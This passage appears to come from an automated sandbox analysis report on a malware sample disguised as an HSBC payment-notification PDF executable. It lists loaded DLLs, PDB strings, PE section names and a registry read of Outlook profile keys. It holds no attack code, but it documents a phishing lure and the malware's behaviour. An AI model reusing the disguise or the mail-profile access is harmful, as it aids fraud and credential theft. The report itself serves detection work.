              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
              Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
              Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
              Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic file information: File size 1539072 > 1048576
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312938919.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.4.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdb source: vds.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.4.dr
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1904523018.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000004.00000003.1875324532.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdbGCTL source: vds.exe.4.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.4.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
              Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
              Source: AppVClient.exe.0.drStatic PE information: real checksum: 0xcd10f should be: 0x14ff8b
              Source: armsvc.exe.0.drStatic PE information: section name: .didat
              Source: alg.exe.0.drStatic PE information: section name: .didat
              Source: chrome_proxy.exe.4.drStatic PE information: section name: .00cfg
              Source: chrome_proxy.exe.4.drStatic PE information: section name: .gxfg
              Source: chrome_proxy.exe.4.drStatic PE information: section name: .retplne
              Source: chrome_proxy.exe.4.drStatic PE information: section name: _RDATA
              Source: chrome_proxy.exe.4.drStatic PE information: section name: malloc_h
              Source: crashreporter.exe.4.drStatic PE information: section name: .00cfg
              Source: crashreporter.exe.4.drStatic PE information: section name: .voltbl
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: section name: _RDATA
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: section name: .gxfg
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: section name: .gehcont
              Source: default-browser-agent.exe.4.drStatic PE information: section name: .00cfg
              Source: default-browser-agent.exe.4.drStatic PE information: section name: .voltbl
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: section name: _RDATA
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: section name: .gxfg
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: section name: .gehcont
              Source: firefox.exe.4.drStatic PE information: section name: .00cfg
              Source: firefox.exe.4.drStatic PE information: section name: .freestd
              Source: firefox.exe.4.drStatic PE information: section name: .retplne
              Source: firefox.exe.4.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.4.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe.4.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.4.drStatic PE information: section name: _RDATA
              Source: minidump-analyzer.exe.4.drStatic PE information: section name: .00cfg
              Source: minidump-analyzer.exe.4.drStatic PE information: section name: .voltbl
              Source: pingsender.exe.4.drStatic PE information: section name: .00cfg
              Source: pingsender.exe.4.drStatic PE information: section name: .voltbl
              Source: plugin-container.exe.4.drStatic PE information: section name: .00cfg
              Source: plugin-container.exe.4.drStatic PE information: section name: .voltbl
              Source: private_browsing.exe.4.drStatic PE information: section name: .00cfg
              Source: private_browsing.exe.4.drStatic PE information: section name: .voltbl
              Source: updater.exe.4.drStatic PE information: section name: .00cfg
              Source: updater.exe.4.drStatic PE information: section name: .voltbl
              Source: updater.exe.4.drStatic PE information: section name: _RDATA
              Source: FXSSVC.exe.4.drStatic PE information: section name: .didat
              Source: elevation_service.exe.4.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe.4.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe.4.drStatic PE information: section name: .retplne
              Source: elevation_service.exe.4.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.4.drStatic PE information: section name: malloc_h
              Source: elevation_service.exe0.4.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe0.4.drStatic PE information: section name: .gxfg
